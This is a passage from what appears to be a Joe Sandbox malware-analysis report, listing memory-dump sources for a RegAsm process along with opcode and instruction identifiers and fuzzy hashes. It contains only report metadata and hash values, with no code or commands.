                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a48acf49aa8fc42dd7bd24430f92b1f28f4f5136f2ca61b3e08581d047e77dc
                                                        • Instruction ID: 70a2939a60e1fa9a3c24b82dde9a4f4f16fabcfc071c0df302ecb7332f581916
                                                        • Opcode Fuzzy Hash: 9a48acf49aa8fc42dd7bd24430f92b1f28f4f5136f2ca61b3e08581d047e77dc
                                                        • Instruction Fuzzy Hash: 32F1D373E405269BCB18CF68C5A05BDFBF2AF45214B199279D856EB380D734EE42CB90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc4da33476b05533a8d4889d949fa4343f25dead23241959f26d5b86aace5750
                                                        • Instruction ID: 2761a1a4b744600820260bbc34da9b17772a6868a2ed379e0e5f062300664334
                                                        • Opcode Fuzzy Hash: dc4da33476b05533a8d4889d949fa4343f25dead23241959f26d5b86aace5750
                                                        • Instruction Fuzzy Hash: C7F19070E40219DFDB14DFA4C890BAEB7B5FF48318F14D5A9E905AB281E731DA85CB90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22d81bedb2b0ee636051c15d3a2ba6761eb2fae41bc778aee74ec2a91778face
                                                        • Instruction ID: f48ad69fdf21f5a407b224c2578c2109663fa5b3426346b56d38fdbc44991fc6
                                                        • Opcode Fuzzy Hash: 22d81bedb2b0ee636051c15d3a2ba6761eb2fae41bc778aee74ec2a91778face
                                                        • Instruction Fuzzy Hash: C1D1CE71A502169BCB54DF64C880BBAB3E6EF44308F06862DEA56DB380EB30DD41DB65
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1b743a50227034f4074ff82c478132713ed35c88174b4a4f45d42f14c0329064
                                                        • Instruction ID: 074584cb43cf9f07d2deb32dfed131e4ab89cfc2ced1c0190cbdc09cac90f230
                                                        • Opcode Fuzzy Hash: 1b743a50227034f4074ff82c478132713ed35c88174b4a4f45d42f14c0329064
                                                        • Instruction Fuzzy Hash: 10D17C75E842298BDF28CA98C5447FDB7B1BB44348F26F02BD807A7280D7749989CB85
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e78251ebf8bf71c6288a5582e554dafefc6261a3821160655868374f486d1e9e
                                                        • Instruction ID: 52993ee9a08a230f735399ffa664036c78e403ba0656056c44377dac65d3c1b3
                                                        • Opcode Fuzzy Hash: e78251ebf8bf71c6288a5582e554dafefc6261a3821160655868374f486d1e9e
                                                        • Instruction Fuzzy Hash: 85E1BF75A40205CFDB18CF58C890AAAB7F5FF48314F2591A9E916EB391D734EE81CB90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bee45a3871442205c5277c909369cb1ceffa8ac91c2a299124dfbd836a8210c1
                                                        • Instruction ID: 4844903bae88d38f11030e3f852f6335f05b1150593bc21eacda980d3ee08e50
                                                        • Opcode Fuzzy Hash: bee45a3871442205c5277c909369cb1ceffa8ac91c2a299124dfbd836a8210c1
                                                        • Instruction Fuzzy Hash: 7CD1B431B803298FEB65DB15CC90BAAB7B6BB49308F44D0F9D909A7241DB34AD85CF51
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8634519529c3f0e46ccfaedd84b98303ff1f846fc39872d3395eb57f8a597fc
                                                        • Instruction ID: a303f527a3e55126d1a95257f9adf2cf9d6dc2be8a60cbdd94501b70bedcd3ac
                                                        • Opcode Fuzzy Hash: c8634519529c3f0e46ccfaedd84b98303ff1f846fc39872d3395eb57f8a597fc
                                                        • Instruction Fuzzy Hash: EFC1B371E802159BDB24CF98CC84BBEB7B6EF44758F14D269D915AB2C0D770E982CB90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                        • Instruction ID: 5f128525bde63d28acdb9c48ad1d327827165ea1733d241233cb870650e34f19
                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                        • Instruction Fuzzy Hash: 79B11831780645AFDB25DBA4C854BBEB7F6AF44308F14A1A5E952DB381DB30ED81CB90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3023c5dff17a5558c33fb90b100c9b4a4a6e8dacad6b378368df3d6955e851a9
                                                        • Instruction ID: f3d9ac776d46102a6e8c7676fa609346139d3bfa3f1cf80b3b2d5abd86bccf76
                                                        • Opcode Fuzzy Hash: 3023c5dff17a5558c33fb90b100c9b4a4a6e8dacad6b378368df3d6955e851a9
                                                        • Instruction Fuzzy Hash: DBA19F72A80215AFEB12DF64CC85FBE77B9AF45754F41A064FA00AB2A0D7759C50CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4654e706d8609b840f32c6cc392e1c3e61778e66529110e24650dfd02d8579b0
                                                        • Instruction ID: 1951bcf18763a931131b8b3f3fb2abbd8c77000d75f4f46b94362bd82f27f753
                                                        • Opcode Fuzzy Hash: 4654e706d8609b840f32c6cc392e1c3e61778e66529110e24650dfd02d8579b0
                                                        • Instruction Fuzzy Hash: 8AC158742483808FD764CF15C484BABB7E6BF88348F44996DE9898B390D774E949CF92
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 723fc5d1ce809f476ccd17ef6e71d999627b2771b59ab522036999b7f4747c8a
                                                        • Instruction ID: 37e357cf809bbe8ea008b1abe1ea3f838ab0961657a040f975ae4341c16d15f0
                                                        • Opcode Fuzzy Hash: 723fc5d1ce809f476ccd17ef6e71d999627b2771b59ab522036999b7f4747c8a
                                                        • Instruction Fuzzy Hash: A6A1B170B806169FDB28DF65D990BAAB7B1FF44318F00A139EB459B281DF34E951CB90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 78cafde20aca94d6f288445cfc81a7c7248795af283e8a70844c8e78ec42c360
                                                        • Instruction ID: 6e3d9095ef9a0cca7e937a0afc71a3913c97455cc90ad3d017b019fefeb3a741
                                                        • Opcode Fuzzy Hash: 78cafde20aca94d6f288445cfc81a7c7248795af283e8a70844c8e78ec42c360
                                                        • Instruction Fuzzy Hash: CA913571AC06118BEB24DF58C885BBEB7A2EF88758F09E075FD069B241E734D941CB91
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aaef2e246f0edb6cd77c73abe246f3a81b2fc93a2cfad97c9944ea0f2b98b1cd
                                                        • Instruction ID: 2c4d8d95db3a8d70d31630cf589d372882bda5236691a87856f8976c421a6c9a
                                                        • Opcode Fuzzy Hash: aaef2e246f0edb6cd77c73abe246f3a81b2fc93a2cfad97c9944ea0f2b98b1cd
                                                        • Instruction Fuzzy Hash: 40B113716583408FD364CF28C480A5ABBF1BF89308F18996EF899CB352D331E985CB52
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                        • Instruction ID: 78f73d9d2f8b773965f6a2b8666b3617c04a6aaa9ef0f68e8dbc817cad602814
                                                        • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                        • Instruction Fuzzy Hash: EF815F71AC42D58FDB224D9CC8C42BDBB61EF52309F18E6BAE4429B381C374D846D791
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                        • Instruction ID: 9eda935cb094e3b4858cedf668944622dd5e19d58deaf70e88c5bd83b89b9b7e
                                                        • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                        • Instruction Fuzzy Hash: F2914E72650A068FD725CF29DC85666BBE0FF5632CB14DB18E4E6DB6A0CB35E511CB00
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2ed56aa866461a27fa4a5b392380b2c374d5430f54b09231a16b6f4e1510ed80
                                                        • Instruction ID: 9f39d2cd39ecb6ced065022226c2322cf5ac82633f1dc30ae8f33de26c025197
                                                        • Opcode Fuzzy Hash: 2ed56aa866461a27fa4a5b392380b2c374d5430f54b09231a16b6f4e1510ed80
                                                        • Instruction Fuzzy Hash: 0991F672E442069BDB14CFA8CA407AAB7E3AF44318F24D53EE855DB691D734E902CB90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b94080866c8ad408547007da8eefa67bff2ffe9579fb5691e1b79c595fc80526
                                                        • Instruction ID: be179e84f96dcbd7a9a993bb00abf008b8e1d8725c012e0564f90e8c653d9b2f
                                                        • Opcode Fuzzy Hash: b94080866c8ad408547007da8eefa67bff2ffe9579fb5691e1b79c595fc80526
                                                        • Instruction Fuzzy Hash: CC91C372A405159BCB08CF69C8906BABBF2FF88318B1AC56EE915DB295D734E901CB50
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3636c51fd999cd27af6912c933345748d408ef0bb45cf60465767750644544c4
                                                        • Instruction ID: f42c0dad17a8b818cdb313aeb94d6bbec2547b61f4156097192fcd1ca9edba67
                                                        • Opcode Fuzzy Hash: 3636c51fd999cd27af6912c933345748d408ef0bb45cf60465767750644544c4
                                                        • Instruction Fuzzy Hash: F081D471E406158BCB19CFADCA845AEB7F1FF88314B24922ED825E7284E7749D52CB90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18d1a994e5b8340a6f29abd37749ed7f34260d66f9b0cfb9288286032076758
                                                        • Instruction ID: 3702691853abed8608b308683e6ef83cb27feb3df5b273962ff70028525a01af
                                                        • Opcode Fuzzy Hash: b18d1a994e5b8340a6f29abd37749ed7f34260d66f9b0cfb9288286032076758
                                                        • Instruction Fuzzy Hash: 7481A571A401199FCB14CF5AC8849AEBBB2FFC9258B29D2A5E8549B345D730E941CF90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8db2c32e82cd594882fadf4c7c79cddce6fba3560db6fdbd8cc96fd1d255223a
                                                        • Instruction ID: 485b31b891dc7720538d5c5183eaa46662d24c1a9d17709ce880587da02d3542
                                                        • Opcode Fuzzy Hash: 8db2c32e82cd594882fadf4c7c79cddce6fba3560db6fdbd8cc96fd1d255223a
                                                        • Instruction Fuzzy Hash: 8B81D272E402159BCB19CFA8C5806EEFBF2EF88310B599169D916EB385D730DD41CB90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction ID: 0773267177fb0c956072902f2d7dd66a55f80eca86f982c1cf7af76c8f36137b
                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction Fuzzy Hash: 89818131A406099FCF18CF98C990AEEBBB2BF84314F24D16DE8169B344DB34E912CB40
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                        • Instruction ID: b1c1e9f5f9b744d3721632c7111828bf812b5fc0b6ae776beba0cd304e8115a2
                                                        • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                        • Instruction Fuzzy Hash: F981A375E801258BDF14CF68C888BFDB7B2EB84348F19E16AD816B7384D7315945CB91
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                        • Instruction ID: 7809de594759a506a41658b3c2d6bfb7fe00c17f96cd59973d9d8e317e40d02b
                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                        • Instruction Fuzzy Hash: E7515B75A40219DFCB14CF98C480AAEF7B2FF84718F2491B9D815A7354E731AE42CB90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c31573816aa8b2be95d8154b113db3ce4ff583063fee50d4ac945bc886e62b0
                                                        • Instruction ID: a72bb4e77e5464cc129e30a47bbf0355c6096777c53bb6f2b15e7c95df22b6d2
                                                        • Opcode Fuzzy Hash: 0c31573816aa8b2be95d8154b113db3ce4ff583063fee50d4ac945bc886e62b0
                                                        • Instruction Fuzzy Hash: 955104709C0156DBDB258B64CC44BE8B7BAFF05318F14D2A9E529A72C1D734A9D2CF80
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4dd4f1dbbc24d2babcade407f1ec0376fb981ee9599d743bd42d0a096759383
                                                        • Instruction ID: 8075db8998b6f11215454f3b5eaa6a0f7262f3cd50aa053ea8a44e5f66ac3225
                                                        • Opcode Fuzzy Hash: d4dd4f1dbbc24d2babcade407f1ec0376fb981ee9599d743bd42d0a096759383
                                                        • Instruction Fuzzy Hash: 5041E271680311DFD722AF65C880B2ABBE9EF44788F11E46AEA55DB251DB70DD40CF90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0adee5c38f7b58bfb63e9cb9988cf2ee19a08446ccb2c93442b332a67b56b1f1
                                                        • Instruction ID: c63375c8b1d0fb8d42f4bbe5fdd6d76fc09cb639e08adef47c172a0955ff8c03
                                                        • Opcode Fuzzy Hash: 0adee5c38f7b58bfb63e9cb9988cf2ee19a08446ccb2c93442b332a67b56b1f1
                                                        • Instruction Fuzzy Hash: 4741C3712043418BC708CF65D8A597A7BE2FBC4729F15895EF8958B382C731E91ACBA1
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                        • Instruction ID: 2c0c23c99386e98e69ee0b94839529c70a7072c917f29a6e6db9e0657b234525
                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                        • Instruction Fuzzy Hash: B1418075B50205ABDB16DBD9CE94AAFB7BAAF88704F24907DE804E7341D770DD028B60
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d8c68aa40b05e30afd121db50ff32cffb109c8a56fe0bd7988532b6d5c22e0e
                                                        • Instruction ID: 8525c6ed6d120e2f4ed0fc8780233a2560177a6cab9eaba47b1b700dc7ad72a0
                                                        • Opcode Fuzzy Hash: 8d8c68aa40b05e30afd121db50ff32cffb109c8a56fe0bd7988532b6d5c22e0e
                                                        • Instruction Fuzzy Hash: F441FE30A482949BCB14CF2DC8A5BBAFBF1AF89308F09D499E4C58F645C734A456DB60
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2edfb163bd5f85b6ff7027ddb4209004a44360d4129d9347fcf4b3eb7584067d
                                                        • Instruction ID: df3a503914332ba58af55025eb57eb2380612692f1367bb447b521f40338e082
                                                        • Opcode Fuzzy Hash: 2edfb163bd5f85b6ff7027ddb4209004a44360d4129d9347fcf4b3eb7584067d
                                                        • Instruction Fuzzy Hash: 7241E5B15C42109FC320EF25D894E6B77A5EB84364F40D92DFA5A47691CB30E8A5CFE1
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                        • Instruction ID: 84f700412147b4da968885bd7e90bb59953af576d68ac76dc468b2e2aeaeb2a1
                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                        • Instruction Fuzzy Hash: 44412A31A10221EBDB20DE2698407BEB772EB4475CF27D06EAD498B788D7358D40CBA4
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                        • Instruction ID: e5c2a6b2ae221da92689e55f30e4a45c8c5df12c22ea619c2318f534e9eb3ab0
                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                        • Instruction Fuzzy Hash: 95419A71A40704EFCB25DFA8C980AAAB7F8FF08305B10996DE556DB290D330EA44CF90
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 128db6f6755c0800b84edab5c5860b99613b3b1f8bbe5771f64f994d8b5b9d87
                                                        • Instruction ID: f1fcbccedaa1fc56beb2fa0a482a0d72f0d025367fb126d5764d318eb166ab6a
                                                        • Opcode Fuzzy Hash: 128db6f6755c0800b84edab5c5860b99613b3b1f8bbe5771f64f994d8b5b9d87
                                                        • Instruction Fuzzy Hash: 6841AC70981700CFCB21EF64D984765B7F6EF45314F14E1A9DA169B2E0DB30A982CF51
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: defbfb785242176854f0d0f14208e587666a87e3bba4117952500cdb8bf13632
                                                        • Instruction ID: 73521f677ee3f894902644f0b85f552011cdec41d57fd6a1d9e73f1d9c532bf9
                                                        • Opcode Fuzzy Hash: defbfb785242176854f0d0f14208e587666a87e3bba4117952500cdb8bf13632
                                                        • Instruction Fuzzy Hash: E64116319401556BC740CB26C4A06FABFF1AF8530DF4EC4AAE9819B281D639D947C770
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1032c9288f0a7ffd4caa1fc1c9a9bfbc0df0a56e82aaa2f241bbaa1e9be48422
                                                        • Instruction ID: c03a58c49d9aa12138e27f296efd832690d0ed0a60091fb4e47fc576342f3789
                                                        • Opcode Fuzzy Hash: 1032c9288f0a7ffd4caa1fc1c9a9bfbc0df0a56e82aaa2f241bbaa1e9be48422
                                                        • Instruction Fuzzy Hash: F73135327401069BCB18CEA8CD54BA7BB97EF84314F24D53DE918CB684E774D946C790
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
